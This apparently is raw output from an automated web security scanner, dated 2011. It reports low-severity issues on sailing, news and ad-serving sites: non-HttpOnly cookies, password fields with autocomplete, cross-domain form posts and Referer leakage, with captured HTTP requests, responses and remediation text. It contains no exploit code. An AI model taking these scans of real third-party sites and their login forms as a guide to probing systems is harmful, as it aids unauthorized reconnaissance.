HTTP/1.1 302 Found Date: Thu, 20 Jan 2011 00:14:37 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:14:37 GMT; path=/; domain=.btrll.com Expires: Tues, 01 Jan 1980 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/done;Video;1295482442 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]] HTTP/1.1 Host: brxserv.btrll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;
Response
HTTP/1.1 302 Found Date: Thu, 20 Jan 2011 00:40:05 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:05 GMT; path=/; domain=.btrll.com Expires: Tues, 01 Jan 1980 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/done;Video;1295482442 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]] HTTP/1.1 Host: brxserv.btrll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
Response
HTTP/1.1 302 Found Date: Thu, 20 Jan 2011 00:14:22 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:14:22 GMT; path=/; domain=.btrll.com Expires: Tues, 01 Jan 1980 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/mid;Video;1295482442 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]] HTTP/1.1 Host: brxserv.btrll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;
Response
HTTP/1.1 302 Found Date: Thu, 20 Jan 2011 00:40:04 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:04 GMT; path=/; domain=.btrll.com Expires: Tues, 01 Jan 1980 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/mid;Video;1295482442 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /translate_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&prev=_t&rurl=translate.google.com&usg=ALkJrhglTnSTIWJRTLWJxtBONK41T28E_A HTTP/1.1 Host: translate.googleusercontent.com Proxy-Connection: keep-alive Referer: http://translate.google.com/translate_p?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&prev=_t&usg=ALkJrhjG6jHf6mTOkkomcii4GFk9D7ZJWg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns=http://www.w3.org/1999/xhtml><head><script>(function (){ function t ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
SERVERID=iom-web13; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.barcelonaworldrace.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Found Date: Thu, 20 Jan 2011 00:45:05 GMT Server: Apache Location: http://www.barcelonaworldrace.org/en/index.php Content-Length: 0 Connection: close Content-Type: text/html Set-Cookie: SERVERID=iom-web13; path=/
The following cookie was issued by the application and does not have the HttpOnly flag set:
SERVERID=iom-web13; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1 Host: www.barcelonaworldrace.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 20 Jan 2011 00:45:06 GMT Server: Apache Connection: close Content-Type: text/html Set-Cookie: SERVERID=iom-web13; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!-- inclusion de la gestion des channel ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.regattaregatta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 20 Jan 2011 00:50:26 GMT Server: Microsoft-IIS/6.0 Set-Cookie: 9d1da0e50aa9b6d723bb7d2254c4deb6=f2f5e593b3e0e56bdba4d7906218ec7f; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Fri, 21-Jan-2011 00:50:26 GMT; path=/ X-Powered-By: PleskWin X-Powered-By: ASP.NET Date: Thu, 20 Jan 2011 00:50:26 GMT Connection: close
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?m=login HTTP/1.1 Host: www.tuenti.com Proxy-Connection: keep-alive Referer: http://www.tuenti.com/?gotHash=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: keep_ru=1; ourl=%3F
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.tuenti.com Proxy-Connection: keep-alive Referer: http://www.tuenti.com/share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; keep_ru=1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.usaca.info Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:51:32 GMT Server: Apache X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 3730abe3084fe49ecac82b2df16b8c34=6f9bhkba6goll5j4caq4ddjh17; path=/ Set-Cookie: ja_purity_tpl=ja_purity; expires=Tue, 10-Jan-2012 00:51:33 GMT; path=/ Last-Modified: Thu, 20 Jan 2011 00:51:33 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
psw
Request
GET /index.php?lang=en&fn=folio&FolioID=82&co=1 HTTP/1.1 Host: americascup.mediaaccess.evolix.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:37:05 GMT Server: Apache Set-Cookie: PHPSESSID=883ef2c29bf4b113c55a2f33e2570d50; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 188402
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media - ...[SNIP]... <td colspan='2' class='typo_login' align='center'> <form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '> ...[SNIP]... <input name="login" id='login' type="text" class="form" > psw <input name="psw" id='psw' type="password" class="form" > <input type="button" class="form" value="ok" name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'> ...[SNIP]...
The form contains the following password field with autocomplete enabled:
psw
Request
GET /index.php HTTP/1.1 Host: americascup.mediaaccess.evolix.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:36:56 GMT Server: Apache Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media</ ...[SNIP]... <td colspan='2' class='typo_login' align='center'> <form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '> ...[SNIP]... <input name="login" id='login' type="text" class="form" > psw <input name="psw" id='psw' type="password" class="form" > <input type="button" class="form" value="ok" name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'> ...[SNIP]...
The form contains the following password field with autocomplete enabled:
password
Request
GET /submit?phase=2&url=http://blip.tv/file/4639878/&title=Sundog%20SeaCart%2030%20-%20Ft%20Lauderdale%20to%20Key%20West%202011%20-%20DeckCam HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.americascupmedia.com/index.php
The form contains the following password field with autocomplete enabled:
psw
Request
GET /index.php HTTP/1.1 Host: www.americascupmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:44:48 GMT Server: Apache Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media</ ...[SNIP]... <td colspan='2' class='typo_login' align='center'> <form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '> ...[SNIP]... <input name="login" id='login' type="text" class="form" > psw <input name="psw" id='psw' type="password" class="form" > <input type="button" class="form" value="ok" name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'> ...[SNIP]...
The form contains the following password field with autocomplete enabled:
psw
Request
GET /index.php?lang=en&fn=folio&FolioID=83&co=1 HTTP/1.1 Host: www.americascupmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:44:49 GMT Server: Apache Set-Cookie: PHPSESSID=ec7a22611c57b8147c7c5c0229457767; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 156568
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media - ...[SNIP]... <td colspan='2' class='typo_login' align='center'> <form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '> ...[SNIP]... <input name="login" id='login' type="text" class="form" > psw <input name="psw" id='psw' type="password" class="form" > <input type="button" class="form" value="ok" name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'> ...[SNIP]...
The form contains the following password field with autocomplete enabled:
passwd
Request
GET / HTTP/1.1 Host: www.regattaregatta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 20 Jan 2011 00:50:26 GMT Server: Microsoft-IIS/6.0 Set-Cookie: 9d1da0e50aa9b6d723bb7d2254c4deb6=f2f5e593b3e0e56bdba4d7906218ec7f; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Fri, 21-Jan-2011 00:50:26 GMT; path=/ X-Powered-By: PleskWin X-Powered-By: ASP.NET Date: Thu, 20 Jan 2011 00:50:26 GMT Connection: close
The form contains the following password field with autocomplete enabled:
input_password
Request
GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
pword
Request
GET /velux_5_oceans_2010_race/ HTTP/1.1 Host: www.w-w-i.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
The page contains a form which POSTs data to the domain www.elmundo.es. The form contains the following fields:
q
enviar
Request
GET /translate_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/nautica.html&prev=_t&rurl=translate.google.com&usg=ALkJrhgbghhSU0mR1pBT2WU73fJ07Tz9LA HTTP/1.1 Host: translate.googleusercontent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PREF=ID=4d976405d4b1f367:TM=1295482589:LM=1295482590:S=snr5DTM1C3a-1gdp;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:44:12 GMT Expires: Thu, 20 Jan 2011 00:44:12 GMT Cache-Control: private, max-age=86400 Accept-Ranges: none Content-Location: http://www.elmundo.es/elmundo/nautica.html Content-Type: text/html; charset=UTF-8 Content-Language: en X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns=http://www.w3.org/1999/xhtml><head><script>(function (){ function ti_a(b){this. ...[SNIP]... </p><form action=http://www.elmundo.es/tiempo/index.html method=post> <span onmouseover="_tipon(this)" onmouseout="_tipoff()"> ...[SNIP]...
The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
cmd
business
item_name
item_number
no_shipping
return
cancel_return
no_note
currency_code
lc
bn
submit
Request
GET /advertise.htm HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:23:32 GMT Server: Apache Last-Modified: Mon, 18 Jan 2010 21:56:20 GMT ETag: "21dc76-3008-6c654900" Accept-Ranges: bytes Content-Length: 12296 Vary: User-Agent Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... </p> <form action="https://www.paypal.com/cgi-bin/webscr" method="post"> <center> ...[SNIP]...
11. Cross-domain Referer leakagepreviousnext There are 38 instances of this issue:
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /adj/cm.martini/;net=cm;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;;cmw=owl;sz=160x600;net=cm;ord1=881330;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.weath_l;btg=cm.sports_l;ord=3751955344? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 20 Jan 2011 00:20:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 729
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a95/0/0/%2a/v;233352718;0-0;3;49633220;2321-160/600;39898763/39916550/1;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports, ...[SNIP]... aa_gn1;btg=cm.weath_l;btg=cm.sports_l;~aopt=3/0/ef/0;~sscs=%3fhttp://www.coloradoski.com/Resorts/Southwest/?utm_source=collective160x60&utm_medium=banner&utm_content=pricepoint&utm_campaign=southwest"><img src="http://s0.2mdn.net/viewad/3006574/SW_Colorado_Ad_3-SS.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /index.php?lang=en&fn=folio&FolioID=82&co=1 HTTP/1.1 Host: americascup.mediaaccess.evolix.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
